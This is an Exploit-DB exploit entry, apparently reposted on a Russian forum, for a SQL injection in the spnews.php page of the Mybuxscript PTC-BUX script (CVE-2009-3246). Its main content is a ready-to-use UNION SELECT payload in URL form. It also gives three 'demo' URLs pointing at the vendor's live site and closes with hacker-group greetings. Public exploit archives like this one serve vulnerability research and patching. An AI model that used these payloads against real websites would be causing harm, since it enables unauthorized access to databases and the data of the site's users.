- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 9555
- Проверка EDB
-
- Пройдено
- Автор
- HXH
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-3246
- Дата публикации
- 2009-08-31
Код:
------------------------------------------------------------
Mybuxscript PTC-BUX (spnews.php) SQL Injection Vulnerability
------------------------------------------------------------
Author.: HxH
Contact: HxH[at]live[dot]at
---------------------------
Script.: Mybuxscript PTC-BUX (BASIC/ADVANCE/PRO)
Home...: http://www.mybuxscript.com/index.php?cPath=1
-----------------------------------------------------
Exploit:
[~] http://localhost/Path/?p=spnews&id=-7+UNION+SELECT+1,version(),3,4--
------------------------------------------------------------------------
Demo...:
A: http://mybuxscript.com/salescripts/ptc_basic/?p=spnews&id=-7+UNION+SELECT+1,version(),3,4--
B: http://mybuxscript.com/salescripts/ptc_advance/?p=spnews&id=-10+UNION+SELECT+1,version(),3,4--
C: http://mybuxscript.com/salescripts/ptc_professional/?p=spnews&id=-12+UNION+SELECT+1,version(),3,4--
------------------------------------------------------------------------------------------------------
Greetz.: ~ JiKo ~ The Sad Hacker ~ All No-Exploit.com Members
-------------------------------------------------------------
# milw0rm.com [2009-08-31]- Источник
- www.exploit-db.com
